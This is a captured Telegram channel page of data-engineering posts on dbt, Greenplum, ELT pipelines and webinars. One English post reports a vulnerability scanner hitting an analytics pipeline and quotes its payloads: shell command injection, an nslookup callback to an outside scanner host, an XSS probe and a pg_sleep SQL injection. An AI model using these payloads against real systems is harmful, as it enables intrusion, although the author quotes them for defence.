TGViewer
Channel Public Channel
Data Apps Design

Data Apps Design

@data_apps

В этом блоге я публикую свои выводы и мнения на работу в Data:

— Data Integration
— Database engines
— Data Modeling
— Business Intelligence
— Semantic Layer
— DataOps and DevOps
— Orchestrating jobs & DAGs
— Business Impact and Value
Subscribers
2.08K
Photos
143
Videos
2
Links
237

Showing posts older than #225 · Back to latest

Older Posts 20 shown
Post #224 785
Somebody is overwhelming our analytics trying to find security breaches.

A brief infrastructure setup: we gather user events data in mobile apps (iOS, Android) and Web via Snowplow trackers, send it to Kafka queues, then land the data into DWH (Redshift) staging area.

Looks like a vulnerability scanner is used. Take a look at the sample data:

echo bvazvs$()\ igzdlg\nz^xyu||a #' &echo bvazvs$()\ igzdlg\nz^xyu||a #|" &echo bvazvs$()\ igzdlg\nz^xyu||a #
bxss.me/t/xss.html?%00
`(nslookup hitxbheyywgyq5e37d.bxss.me||perl -e "gethostbyname('hitxbheyywgyq5e37d.bxss.me')")`
aUV52Y1o' OR 826=(SELECT 826 FROM PG_SLEEP(15))--
^(#$!@#$)(()))******

Despite basic checks are enforced (non-empty string, valid json), around 1k events managed to get into DWH 😐

What I've done so far:

1. Filtered out and deleted problem rows from database
2. Enforced data type checks

Curious case. Finally I have faced with tech pirates 😵‍💫

Let's see if it works fine. Any other ideas?
Post #223 987
Ух, как же много материала, которым хочется поделиться.

Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData

Будете ждать? 🤔
Post #222 1.12K
Сегодня хотел бы поговорить о широко распространенной СУБД Greenplum и, в частности, о Platform Extension Framework (PXF) - расширении, с помощью которого открываются почти неограниченные возможности интеграции с множеством внешних систем и форматов данных.

В этой публикации Вас ждет:

– Основные возможности PXF, конфигурация, способы оптимизации.
– Организация Extract - Load с помощью PXF (Data Lake / OLTP).
– Объединение локальных и внешних таблиц в запросах (Federated queries).
– Запись данных во внешние системы (Clickhouse).

Читать на Хабр →

#pipelines #ELT #dwh #greenplum #pxf
Хабр Сценарии применения Greenplum PXF для интеграции с Data Lake, OLTP, Clickhouse Привет! Меня зовут Артемий Козырь, и я Analytics Engineer в Wheely. Популярность массивно-параллельных СУБД ( MPP ) для решения аналитических задач неукоснительно растет. Сегодня хотел бы...
Post #221 1.02K
A very useful and handy implementation of Load step from ELT acronym.

Use this example to build your own Extract - Load solution and take into account all the possible outcomes and issues you may face in advance:

– Handling duplicate rows (even when uniqueness constraint is not enforced)
– Coping with DELETEs on source side (hard deletes)
– Allowing data inspection and time travel with metadata attributes
– Examples for Amazon Redshift, Google BigQuery, Snowflake

https://docs.hevodata.com/data-loading/loading-data-to-warehouse/

#elt #pipelines
Post #220 1.47K
Слайды моего доклада с [dbt meetup]

Зрелость DBT-проекта. Есть, куда расти?

– К чему стремимся, используя dbt?
– Матрица зрелости dbt-проекта
– Кейс Wheely + dbt
– Что дальше и как это использовать у себя

#meetup

🌐 @data_apps | Навигация по каналу
Google Docs [dbt meetup] 2022-06-14 Зрелость dbt-проекта Зрелость dbt-проекта Есть, куда расти?
Post #219 971
Data Apps Design Во вторник 14 июня в 19.00 в рамках развития сообщества @dbt_users будет проведен второй митап, посвященный инструменту dbt. Интереснейшие доклады ребят из Wheely, ADV/web-engineering co., Space307 и NabuMinds: – dbt + Clickhouse: кластер, версионирование…
Начинаем, подключайтесь:
https://www.youtube.com/watch?v=AxXv-988B1A
Post #218 800
Мой доклад стартует в 19.05:

Зрелость DBT-проекта. Есть, куда расти?

– К чему стремимся, используя dbt?
– Матрица зрелости dbt-проекта
– Кейс Wheely + dbt
– Что дальше и как это использовать у себя
Post #217 765
Во вторник 14 июня в 19.00 в рамках развития сообщества @dbt_users будет проведен второй митап, посвященный инструменту dbt.

Интереснейшие доклады ребят из Wheely, ADV/web-engineering co., Space307 и NabuMinds:

– dbt + Clickhouse: кластер, версионирование данных и другие сложности реализации
– Data Quality в Modern Data Stack
– Зрелость dbt-проекта. Есть, куда расти?
– dbt в etl-командах: снимаем типовые боли байтовозов

Слоты фиксированы по времени, можно подключаться на любой доклад. После каждого доклада есть время на вопросы-ответы и общение.

Ссылка на ютуб придет как обычно перед началом митапа. До встречи 😉

https://space307.team/dbtmeetup
Post #216 852
Жизнь на болотах
Или когда лягушки активизируются во время вебинара

#humor
Post #215 976
Data Apps Design Привет! Сегодня продолжаем – 2 часть вебинара: Extract - Load как сервис и как собственное решение. Поиск баланса и дзен – 1. In-house EL + LIVE MaestroQA + Airflow – 2. Гибридные подходы + LIVE Airbyte – 3. Жизнь после EL – Transform & Deliver – dbt + Looker…
Посмотреть слайды обоих дней можно по ссылке:
https://docs.google.com/presentation/d/1S3H02t8plk_XbZVKvWfWy6ZY36QTPO3FDbZMeYO4n9U/edit?usp=sharing
Google Docs DE Intensive – Extract - Load как сервис и как собственное решение Онлайн образование otus.ru
Post #214 836
Привет! Сегодня продолжаем – 2 часть вебинара:

Extract - Load как сервис и как собственное решение. Поиск баланса и дзен

– 1. In-house EL + LIVE MaestroQA + Airflow
– 2. Гибридные подходы + LIVE Airbyte
– 3. Жизнь после EL – Transform & Deliver – dbt + Looker

Опыт production pipelines, взвесим, сравним плюсы и минусы.

Ссылка на YouTube-трансляцию: https://youtu.be/hoqM7gfqQNg
Post #213 670
Data Apps Design Привет! Сегодня и завтра 23-24 мая в 20.00 приглашаю на вебинар из 2-х частей (интенсив). Extract - Load как сервис и как собственное решение. Поиск баланса и дзен – SaaS решения и их ограничения – Выгрузки через API-вызовы – оптимальные способы реализации…
Запустил трансляцию, присоединяйтесь!
https://www.youtube.com/watch?v=AN__n3xefv8
YouTube Демо-занятие курса «Data Engineer». День 1 Extract - Load с помощью SaaS-сервиса vs. Cобственное решение. Поиск баланса и дзен. – Extract-Load через SaaS решения. Возможности готовых сервисов, их надежность и ограничения – Extract-Load через API-вызовы, обращения к СУБД и CDC – оптимальные способы…
Post #212 637
Привет! Сегодня и завтра 23-24 мая в 20.00 приглашаю на вебинар из 2-х частей (интенсив).

Extract - Load как сервис и как собственное решение. Поиск баланса и дзен

– SaaS решения и их ограничения
– Выгрузки через API-вызовы – оптимальные способы реализации
– Гибридные подходы
– Автоматизация выгрузки, retries, notifications с помощью Airflow
– Накопление истории и организация Data Lake в S3 перед DWH

Рассмотрим опыт построения production pipelines, взвесим плюсы и минусы, сделаем выводы.

Ссылка на регистрацию: https://otus.ru/lessons/data-engineer/#event-2024
Ссылка на YouTube-трансляцию будет опубликована здесь за 5 минут до начала.

🌐 @data_apps | Навигация по каналу
Post #211 626
Post #210 677
Одна из самых важных идей заключается в том, что заказчик, кем бы он ни был (Manager, Product Owner, CEO), почти никогда не ставит задачу в инженерных терминах:

— Налить 100500 гигабайт в Хранилище
— Добавить multithreading в код
— Написать супероптимальный запрос
— Создать 15 dbt-моделей

За любой инженерной задачей стоит решение конкретных бизнес-проблем. Для нас это:

— Прозрачность Customer Support (фиксируем все оценки, инциденты)
— Результативность на ладони (отслеживаем динамику показателей во времени)
— Отчитываемся о KPI команд поддержки (агрегирующие показатели по командам, городам, странам и т.д.)
— Получаем обратную связь и исправляем ошибки (идентификация слабых/проблемных мест и быстрый feedback)
— Постоянно учимся и разбираем кейсы (категоризация тем, организация тренингов и разборов)

И это ключевой фокус, который отличает Analytics Engineer от, например, классических Data Engineer, Backend Engineer.
Post #209 618
Мы могли бы долго и нудно обсуждать, кто такой Analytics (Data / Backend) Engineer, какими инструментами он должен владеть, какие buzzwords в тренде и ценятся в CV, однако, на мой взгляд, гораздо интереснее рассмотреть процесс и результаты его деятельности в рамках конкретной прикладной задачи.

В этой публикации:

— Что значит решение End-to-End и в чем его ценность?
— Организация Extract & Load данных из асинхронного API MaestroQA
— Моделирование витрин данных с помощью dbt
— Поставка ценности для пользователей с помощью Looker

Читать на Хабр →

#pipelines #ELT #dwh #modeling #bi
Хабр Кто такой Analytics Engineer – E2E-решение с использованием bash + dbt + Looker Привет! Меня зовут Артемий Козырь, и я Analytics Engineer в Wheely. Мы могли бы долго и нудно обсуждать, кто такой Analytics ( Data / Backend ) Engineer, какими инструментами он должен владеть, какие...
Post #208 536
Новая публикация на Хабр ⬇️⬇️⬇️
Post #207 719
Excerpt from Python for DevOps / What Does DevOps Mean to the Authors?

At one company, Noah had a project that was over a year late, and the web application had been rewritten three times in multiple languages. This next release only needed a “performance engineer” to get it finished. I remember being the only one brave or stupid enough to say, “What is a performance engineer?” This engineer made everything work at scale. He realized at that point that they were looking for a superhero to save them. Superhero hiring syndrome is the best way to pick up on something being very wrong on a new product or a new startup. No employee will save a company unless they first save themselves.

it turned out that the real issue was inadequate technical supervision. The wrong people were in charge (and verbally shouting down the people who could fix it). By removing a poor performer, listening to an existing team member who knew how to fix the problem all along, deleting that job listing, doing one right thing at a time, and inserting qualified engineering management, the issue resolved itself without a superhero hire.

The solution to the problem isn’t a new hire; it is being honest and mindful about the situation you are in, how you got there, and doing one right thing at a time until you work your way out. There is no superhero unless it is you.
O’Reilly Online Learning Python for DevOps Preface One time Noah was in the ocean, and a wave crashed on top of him and took his breath away as it pulled him deeper into the sea. Just as he started to recover his breath,... - Selection from Python for DevOps [Book]
Post #205 720
Требования к ETL-сервисам – построение аналитических решений на базе myBI Connect

Сегодня речь пойдет о сервисах интеграции данных, их функциональных возможностях и ограничениях. Рассмотрение будем вести на примере сервиса myBI Connect, опираясь на который я реализовал с десяток аналитических проектов за последние несколько лет.

Отмечу, что с конца февраля ребята сделали значительные шаги в сторону развития отказоустойчивости и масштабируемости своего решения. Заглядывайте под кат, если стоите перед выбором коннектора или хотите выжимать максимум из доступного:

— Требования и ожидаемые результаты.

— Функциональные возможности.

— Сценарии использования и бизнес-ценность.

— Планы развития, продвинутое моделирование и BI.

Читать на Хабр →

#pipelines #ELT #dwh
Хабр Требования к ETL-сервисам – построение аналитических решений на базе myBI Connect Привет от Technology Enthusiast ! Сегодня речь пойдет о сервисах интеграции данных, их функциональных возможностях и ограничениях. Рассмотрение будем вести на примере сервиса myBI Connect...
Older posts →
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →